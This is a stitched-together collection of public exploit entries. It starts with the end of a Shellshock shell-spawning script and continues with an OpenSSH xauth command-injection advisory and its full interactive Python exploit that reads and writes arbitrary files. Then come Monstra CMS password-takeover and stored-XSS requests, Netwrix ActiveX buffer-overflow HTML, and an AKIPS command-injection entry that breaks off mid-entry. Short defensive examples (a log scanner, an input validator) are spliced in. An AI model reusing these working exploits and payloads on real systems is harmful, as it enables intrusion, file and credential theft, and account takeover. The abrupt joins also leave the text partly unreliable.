			print "[+] Host is vulnerable, spawning shell..."
			time.sleep(3)
			exploit()
		else:
			print "[-] Host is not vulnerable, quitting..."
			sys.exit()
	except Exception, e:
		print "[-] Something is wrong..."
		print "[-] Error: " + str(e)

if __name__ == "__main__":
	main()
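
For the defensive side, here is an added example (mine, not part of the exploit above) that scans constructed web-server log lines in combined format for the bash function-definition marker that every Shellshock-family payload, including the User-Agent strings in this script, has to carry.

```python
import re
from urllib.parse import unquote

# The bash function-export marker "() {" (optional whitespace) is present in
# every Shellshock-family payload regardless of the exact CVE variant.
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" log format. Request line, referer and user-agent are
# the attacker-controlled fields that a CGI handler receives as environment
# variables, which is where bash evaluates the marker.
COMBINED_LOG = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def looks_like_shellshock(value):
    """True if the raw or the percent-decoded value contains the marker."""
    return bool(SHELLSHOCK_MARKER.search(value)
                or SHELLSHOCK_MARKER.search(unquote(value)))


def scan_combined_log(lines):
    """Return (line_number, field, client) for every line carrying the marker
    in an attacker-controlled field; lines that do not parse are skipped."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = COMBINED_LOG.match(line)
        if not match:
            continue
        for field in ("request", "referer", "agent"):
            if looks_like_shellshock(match.group(field)):
                hits.append((number, field, match.group("client")))
                break
    return hits


# Constructed sample lines, not taken from a real system; 198.51.100.0/24 and
# 203.0.113.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '198.51.100.10 - - [16/Mar/2016:10:00:01 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [16/Mar/2016:10:00:02 +0000] "GET /ucsm/isSamInstalled.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"',
    '203.0.113.5 - - [16/Mar/2016:10:00:03 +0000] "GET /cgi-bin/status?%28%29%20%7B%20%3A%3B%7D%3B HTTP/1.1" 404 209 "-" "curl/7.47.0"',
    '198.51.100.11 - - [16/Mar/2016:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "() {x" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_combined_log(SAMPLE_LOG):
        print("line %d: Shellshock marker in %s from %s" % hit)
```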
            
'''
Author:     <github.com/tintinweb>
Ref:        https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
Version:    0.2
Date:       Mar 3rd, 2016

Tag:        openssh xauth command injection may lead to forced-command and /bin/false bypass

Overview
--------

Name:           openssh
Vendor:         OpenBSD
References:     * http://www.openssh.com/[1]

Version:        7.2p1 [2]
Latest Version: 7.2p1
Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
Platform(s):    linux
Technology:     c

Vuln Classes:   CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin:         remote
Min. Privs.:    post auth

CVE:            CVE-2016-3115



Description
---------

Quoted from the website [1]:

> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.

Summary
-------

An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie.
The newline acts as a command separator to the xauth binary. This attack requires
the server to have 'X11Forwarding yes' enabled; disabling it mitigates this vector.

By injecting xauth commands one gains limited* arbitrary file read/write,
information leakage or xauth-connect capabilities. These capabilities can be
leveraged by an authenticated restricted user - e.g. one with the login shell
configured as /bin/false or one with forced-commands configured - to bypass
account restrictions. This is generally not expected.

The injected xauth commands are performed with the effective permissions of the
logged in user as the sshd already dropped its privileges.

Quick-Info:

* requires: X11Forwarding yes
* bypasses /bin/false and forced-commands
** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)
* does not bypass /bin/nologin (as there is special treatment for this)

Capabilities (xauth):

* Xauth
	* write file: limited chars, xauthdb format
	* read file: limit lines cut at first \s
	* infoleak: environment
	* connect to other devices (may allow port probing)


PoC see ref github.
Patch see ref github.


Details
-------

// see annotated code below

    * server_input_channel_req (serverloop.c)
     *- session_input_channel_req:2299 (session.c [2])
      *- session_x11_req:2181

    * do_exec_pty or do_exec_no_pty
     *- do_child
      *- do_rc_files (session.c:1335 [2])

Upon receiving an `x11-req` type channel request, sshd parses the channel request
parameters `auth_proto` and `auth_data` from the client ssh packet, where
`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
and `auth_data` contains the actual x11 auth cookie. This information is stored
in a session-specific datastore. When `execute` is called on that session, sshd
calls `do_rc_files`, which tries to figure out whether this is an x11 call by checking
whether `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND
there is no system `/sshrc` on the server AND no user-specific `$HOME/.ssh/rc`
is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.
Note that neither `auth_data` nor `auth_proto` is sanitized or validated; they just contain
user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
command separator to the `xauth` binary, this allows a client to inject arbitrary
`xauth` commands.

Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted
input as arguments to that script.
Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]

This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth
command injection:

	SYNOPSIS
       	xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]

		add displayname protocolname hexkey
		generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
		[n]extract filename displayname...
		[n]list [displayname...]
		[n]merge [filename...]
		remove displayname...
		source filename
		info
		exit
		quit
		version
		help
		?
		
Interesting commands are:
	
	info	 - leaks environment information / path
			~# xauth info
			xauth:  file /root/.Xauthority does not exist
			Authority file:       /root/.Xauthority
			File new:             yes
			File locked:          no
			Number of entries:    0
			Changes honored:      yes
			Changes made:         no
			Current input:        (argv):1
	
	source	 - arbitrary file read (cut on first `\s`)
			# xauth source /etc/shadow
			xauth:  file /root/.Xauthority does not exist
			xauth: /etc/shadow:1:  unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
						
	extract  - arbitrary file write
			 * limited characters
	         * in xauth.db format
	         * since it is not compressed it can be combined with `xauth add` to
	           first store data in the database and then export it to an arbitrary
	           location e.g. to plant a shell or do other things.
	
	generate - connect to <ip>:<port> (port probing, connect back and potentially exploit
			   vulnerabilities in X.org)
	
	
Source
------

Inline annotations are prefixed with `//#!`


/*
 * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
 * first in this order).
 */
static void
do_rc_files(Session *s, const char *shell)
{
...
		snprintf(cmd, sizeof cmd, "%s -q -",				
		    options.xauth_location);
		f = popen(cmd, "w");							//#! run xauth -q -
		if (f) {
			fprintf(f, "remove %s\n",					//#! remove <user_tainted_data> - injecting \n auth_display injects xauth command
			    s->auth_display);
			fprintf(f, "add %s %s %s\n",				//#! \n injection
			    s->auth_display, s->auth_proto,
			    s->auth_data);
			pclose(f);
		} else {
			fprintf(stderr, "Could not run %s\n",
			    cmd);
		}
	}
}

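The missing check, as an added example that is not OpenSSH code: an allow-list validator for the three tainted fields applied before the `remove`/`add` lines are built for `xauth -q -`, in the spirit of the upstream fix [5]. The accepted character set, the function names and the sample cookies are assumptions made here.

```c
/*
 * Added example (not OpenSSH code): allow-list validation of the x11-req
 * parameters before they are piped to "xauth -q -", plus a helper that
 * builds the same two-line script do_rc_files() writes. The accepted
 * character set and the function names are assumptions made here.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/*
 * Return 1 if s is non-empty and made only of characters that can occur in
 * an X11 display name, protocol name or hex cookie; 0 otherwise. A newline,
 * space, quote or any other byte is rejected, so a client cannot smuggle a
 * second command into the "remove"/"add" lines written to xauth's stdin.
 */
int xauth_safe_string(const char *s)
{
    size_t i;

    if (s == NULL || s[0] == '\0')
        return 0;
    for (i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];

        if (!isalnum(c) && c != '.' && c != ':' && c != '/' &&
            c != '-' && c != '_')
            return 0;
    }
    return 1;
}

/*
 * Build the stdin script that the vulnerable code above produces with
 * fprintf(), but only after every tainted field passed the allow-list.
 * Returns the script length, or -1 if a field is rejected or out is too small.
 */
int build_xauth_script(char *out, size_t outlen, const char *display,
                       const char *proto, const char *data)
{
    int n;

    if (!xauth_safe_string(display) || !xauth_safe_string(proto) ||
        !xauth_safe_string(data))
        return -1;
    n = snprintf(out, outlen, "remove %s\nadd %s %s %s\n",
                 display, display, proto, data);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/*
 * Count the commands xauth would run from a script: one per newline.
 * A legitimate do_rc_files() script is exactly two commands; more than two
 * means a separator reached xauth, which is the condition this bug creates.
 */
int count_xauth_commands(const char *script)
{
    int count = 0;
    const char *p;

    for (p = script; *p != '\0'; p++)
        if (*p == '\n')
            count++;
    return count;
}

int main(void)
{
    char script[256];
    /* Constructed sample values: a normal cookie and one carrying a
     * newline-separated "source" command, as in the advisory's PoC. */
    const char *display = "localhost:10.0";
    const char *proto = "MIT-MAGIC-COOKIE-1";
    const char *good_cookie = "aabbccdd00112233";
    const char *bad_cookie = "aabbccdd\nsource /etc/passwd\n";

    if (build_xauth_script(script, sizeof script, display, proto,
                           good_cookie) > 0)
        printf("accepted: %d xauth command(s)\n",
               count_xauth_commands(script));
    if (build_xauth_script(script, sizeof script, display, proto,
                           bad_cookie) < 0)
        printf("rejected: cookie contains a byte outside the allow-list\n");
    return 0;
}
```
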
Proof of Concept
----------------

Prerequisites:

* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
* make sure `poc.py`


 Usage: <host> <port> <username> <password or path_to_privkey>

        path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key


poc:

1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:

#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box

#cat /etc/passwd
user2:x:1001:1002:,,,:/home/user2:/bin/false
	
2. run sshd with `X11Forwarding yes` (kali default config)

#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d

3. `forced-commands` - connect with user1 and display env information

#> python <host> 22 user1 .demoprivkey

INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box

INFO:__main__:connecting to: user1:<PKEY>@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>

#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file:       /home/user1/.Xauthority
File new:             no
File locked:          no
Number of entries:    1
Changes honored:      yes
Changes made:         no
Current input:        (stdin):3
/usr/bin/xauth: (stdin):2:  bad "add" command line
...
		
4. `forced-commands` - read `/etc/passwd`

...
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

5. `forced-commands` - write `/tmp/testfile`

#> .writefile /tmp/testfile `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:/usr/bin/xauth: (stdin):2:  bad "add" command line

#> ls -lsat /tmp/testfile
4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile

#> cat /tmp/testfile
\FA65500hi\FA65500`thisisatestfile`\AA

6. `/bin/false` - connect and read `/etc/passwd`

#> python <host> 22 user2 user2password
INFO:__main__:connecting to: user2:user2password@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>

#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
user2:x:1001:1002:,,,:/home/user2:/bin/false
...
	
7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100

#> generate 8.8.8.8:100 .	

#> tcpdump
IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0
	

Mitigation / Workaround
------------------------

* disable x11-forwarding: `sshd_config` set `X11Forwarding no`
* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`

Notes
-----

Verified, resolved and released within a few days. Very impressive.

Vendor response: see advisory [5]

References
----------

[1] http://www.openssh.com/
[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388
[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376
[4] http://linux.die.net/man/1/xauth
[5] http://www.openssh.com/txt/x11fwd.adv
'''

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : <github.com/tintinweb>
###############################################################################
#
# FOR DEMONSTRATION PURPOSES ONLY!
#
###############################################################################
import logging
import StringIO
import sys
import os

LOGGER = logging.getLogger(__name__)
try:
    import paramiko
except ImportError, ie:
    logging.exception(ie)
    logging.warning("Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko")
    sys.exit(1)

class SSHX11fwdExploit(object):
    def __init__(self, hostname, username, password, port=22, timeout=0.5, 
                 pkey=None, pkey_pass=None):
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        if pkey:
            pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)
        self.ssh.connect(hostname=hostname, port=port, 
                         username=username, password=password, 
                         timeout=timeout, banner_timeout=timeout,
                         look_for_keys=False, pkey=pkey)
        
    def exploit(self, cmd="xxxx\n?\nsource /etc/passwd\n"):
        transport = self.ssh.get_transport()
        session = transport.open_session()
        LOGGER.debug("auth_cookie: %s"%repr(cmd))
        session.request_x11(auth_cookie=cmd)
        LOGGER.debug("dummy exec returned: %s"%session.exec_command(""))
        
        transport.accept(0.5)
        session.recv_exit_status()  # block until exit code is ready
        stdout, stderr = [],[]
        while session.recv_ready():
            stdout.append(session.recv(4096))
        while session.recv_stderr_ready():
            stderr.append(session.recv_stderr(4096))
        session.close()
        return ''.join(stdout)+''.join(stderr)              # catch stdout, stderr
    
    def exploit_fwd_readfile(self, path):
        data = self.exploit("xxxx\nsource %s\n"%path)
        if "unable to open file" in data:
            raise IOError(data)
        ret = []
        for line in data.split('\n'):
            st = line.split('unknown command "',1)
            if len(st)==2:
                ret.append(st[1].strip(' "'))
        return '\n'.join(ret)
    
    def exploit_fwd_write_(self, path, data):
        '''
        adds display with protocolname containing userdata. badchars=<space>
        
        '''
        dummy_dispname = "127.0.0.250:65500"
        ret = self.exploit('\nadd %s %s aa'%(dummy_dispname, data))
        if ret.count('bad "add" command line')>1:
            raise Exception("could not store data most likely due to bad chars (no spaces, quotes): %s"%repr(data))
        LOGGER.debug(self.exploit('\nextract %s %s'%(path,dummy_dispname)))
        return path
        
demo_authorized_keys = '''#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
'''    
PRIVKEY = """-----BEGIN RSA PRIVATE KEY-----...-----END RSA PRIVATE KEY-----"""  # demo key body elided


if __name__=="__main__":
    logging.basicConfig(level=logging.DEBUG)  # keyword is 'level', not 'loglevel'
    LOGGER.setLevel(logging.DEBUG)
    
    if not len(sys.argv)>4:
        print """ Usage: <host> <port> <username> <password or path_to_privkey>
        
        path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
        
"""
        sys.exit(1)
    hostname, port, username, password = sys.argv[1:]
    port = int(port)
    pkey = None
    if os.path.isfile(password):
        # read the key file before clearing the password variable
        with open(password,'r') as f:
            pkey = f.read()
        password = None
    elif password==".demoprivkey":
        pkey = PRIVKEY
        password = None
        LOGGER.info("add this line to your authorized_keys file: \n%s"%demo_authorized_keys)
            
    LOGGER.info("connecting to: %s:%s@%s:%s"%(username,password if not pkey else "<PKEY>", hostname, port))
    ex = SSHX11fwdExploit(hostname, port=port,
                          username=username, password=password,
                          pkey=pkey,
                          timeout=10
                          )
    LOGGER.info("connected!")
    LOGGER.info ("""
Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>
""")
    while True:
        cmd = raw_input("#> ").strip()
        if cmd.lower().startswith(".exit") or cmd.lower().startswith(".quit"):
            break
        elif cmd.lower().startswith(".info"):
            LOGGER.info(ex.exploit("\ninfo"))
        elif cmd.lower().startswith(".readfile"): 
            LOGGER.info(ex.exploit_fwd_readfile(cmd.split(" ",1)[1]))
        elif cmd.lower().startswith(".writefile"):
            parts = cmd.split(" ")
            LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))
        else:
            LOGGER.info(ex.exploit('\n%s'%cmd))
         
    # just playing around   
    #print ex.exploit_fwd_readfile("/etc/passwd")
    #print ex.exploit("\ninfo")
    #print ex.exploit("\ngenerate <ip>:600<port> .")                # generate <ip>:port  port=port+6000
    #print ex.exploit("\nlist")
    #print ex.exploit("\nnlist")
    #print ex.exploit('\nadd xx xx "\n')
    #print ex.exploit('\ngenerate :0 . data "')
    #print ex.exploit('\n?\n')
    #print ex.exploit_fwd_readfile("/etc/passwd")
    #print ex.exploit_fwd_write_("/tmp/somefile", data="`whoami`")
    LOGGER.info("--quit--")
            
Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change
Google Dork: intext:"Powered by Monstra"/users/registration
Date: 2016-03-28
Exploit Author: Sarim Kiani
Vendor Homepage: http://monstra.org
Software Link: http://monstra.org/download
Version: 3.0.3
Tested on: Windows OS

==================== TIMELINE ====================
- Discovery Date: March 16 2016
- Disclosed to Vendor: March 22 2016
- Vendor Fixed the Issue: March 27 2016
==================================================

Bug Tracking ID: Github Issue # 405
Link: https://github.com/monstra-cms/monstra/issues/405

Application Description: Monstra is a modern lightweight Content Management System written in PHP.

1. Vulnerability Description:

Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application.

Once logged in as a regular user, or after successfully registering as a new user, use the following URL to obtain information (the username) about other users:
http://localhost/monstra-3.0.3/users/1

The digit '1' is the ID of the Admin, i.e. the first user created in the database. By changing the digit, all registered usernames can be found.

Then, using the 'Edit Profile' option of your own account, the password of any other user, including the Administrator, can be changed by modifying the POST parameters 'user_id', 'login' and 'new_password'.


2. Proof of Concept/Code Flaw:

In file monstra\plugins\box\users\users.plugin.php

Function: getProfileEdit

Line No: 233

  if (Users::$users->update(Request::post('user_id'),
        array('login' => Security::safeName(Request::post('login')),
              'firstname' => Request::post('firstname'),
              'lastname'  => Request::post('lastname'),
              'email'     => Request::post('email'),
              'skype'     => Request::post('skype'),
              'about_me'  => Request::post('about_me'),
              'twitter'   => Request::post('twitter')))) {

            // Change password
            if (trim(Request::post('new_password')) != '') {
                Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password')))));
            }

            Notification::set('success', __('Your changes have been saved.', 'users'));
            Request::redirect(Site::url().'/users/'.$user['id']);

On editing a profile, the user id is taken from Request::post('user_id'). An attacker can supply any user id to the change-password functionality.

Users::$users->update --> updates the password

Header:

POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
Content-Length: 152
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/monstra-3.0.3/users/8/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B

csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save

3. Solution:

Vendor has resolved the issue, use the patch 'User Security Fix # 406'.

Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5

##################################################################################

#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS 
#Google Dork: intext:"Powered by Monstra"
#Date: 2016-03-16
#Exploit Author: Sarim Kiani
#Vendor Homepage: http://monstra.org
#Software Link: http://monstra.org/download
#Version: 3.0.3
#Tested on: Windows OS


Monstra is a modern lightweight Content Management System written in PHP.


1. Description

A Persistent XSS exists in the "Edit Profile" page of the application.


2. Proof of Concept

Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form.

Payload: "><script>alert(1);</script>

The following entries on the page are vulnerable to a Persistent XSS payload:

'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'.

POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra-3.0.3/users/8/edit
Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 440

csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save


3. Solution

No newer (fixed) versions are currently available.  
            

Netwrix Auditor 7.1.322.0 ActiveX (sourceFile) Stack Buffer Overflow Vulnerability


Vendor: Netwrix Corporation
Product web page: http://www.netwrix.com
Affected version: 7.1 (Build 322)

Summary: Netwrix Auditor is an IT audit software that maximizes visibility
of IT infrastructure changes and data access. The product provides actionable
audit data about who changed what, when and where and who has access to what.

Desc: The application suffers from a stack-based buffer overflow vulnerability
when a large number of bytes is passed to the 'sourceFile' string parameter of
the PackFile() and UnpackFile() functions in the 'Netwrix.Common.CollectEngine.dll'
library, resulting in a stack overrun that overwrites several registers, including
the SEH chain. An attacker can gain access to the system of the affected node
and execute arbitrary code.

----------------------------------------------------------------------------
STATUS_STACK_BUFFER_OVERRUN encountered
(1fbc.1470): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=63d7e5b8 ecx=7693047c edx=0040db55 esi=00000000 edi=0072a4ac
eip=7693025d esp=0040dd9c ebp=0040de18 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
kernel32!GetProfileStringW+0x12cc1:
7693025d cc              int     3

--

(1a98.1c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll
eax=00000041 ebx=000012b2 ecx=00350000 edx=00000020 esi=00762240 edi=0034dc7c
eip=5dd16895 esp=0034d75c ebp=0034d778 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010213
Netwrix_Common_CollectEngine!DllUnregisterServer+0x21725:
5dd16895 668901          mov     word ptr [ecx],ax        ds:002b:00350000=????
0:000> !exchain
0034e51c: 00410041
Invalid exception stack at 00410041
----------------------------------------------------------------------------

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5311
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5311.php


07.12.2015

--


#1

<html>
<object classid='clsid:F45C10B1-AEB6-4D2C-BC17-97749DA1F908' id='acnid' />
<script language='VBScript'>
Target = "C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll"
Prototype = "Sub PackFile (ByVal sourceFile As String, ByVal packedFile As String)"
Member = "PackFile"
ID = "CollectEngineLib.FileCompress"
src = String(2000, "A")
packed = "exploit.zip"
acnid.PackFile src, packed
</script>
</html>


#2

<html>
<object classid='clsid:F45C10B1-AEB6-4D2C-BC17-97749DA1F908' id='anida' />
<script language='VBScript'>
Target = "C:\Program Files (x86)\Common Files\Netwrix Auditor\Event Collector\Netwrix.Common.CollectEngine.dll"
Prototype = "Sub UnpackFile (ByVal sourceFile As String, ByVal unpackedFile As String)"
Member = "UnpackFile"
ID = "CollectEngineLib.FileCompress"
src = String(900, "A") + "BB" + "CC" + String(105, "D") + String(100, "EE")
unpack = "exploit.zip"
anida.UnpackFile src, unpack
</script>
</html>
            
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
# Date: 03-14-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray 
# WebPage: http://somethingbroken.com/
# Vendor Homepage: https://www.akips.com/
# Software Link: https://www.akips.com/showdoc/download
# Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
# Tested on: FreeBSD 10.2-RELEASE-p7
# CVE : N/A

1. Description

The "username" login parameter allows OS command injection: a failed login attempt returns the injected command's output in a limited login-failure field.

By using the concatenation operator '||', a command may be appended to the username.

The vendor has stated the following:
"Apparently the issue is in a Perl module which does an open2() of a
custom PAM program.  The command is not being properly sanitised." - Vendor Reply
 
http://somethingbroken.com/vuln/0002.html

2. Proof of Concept

example request:

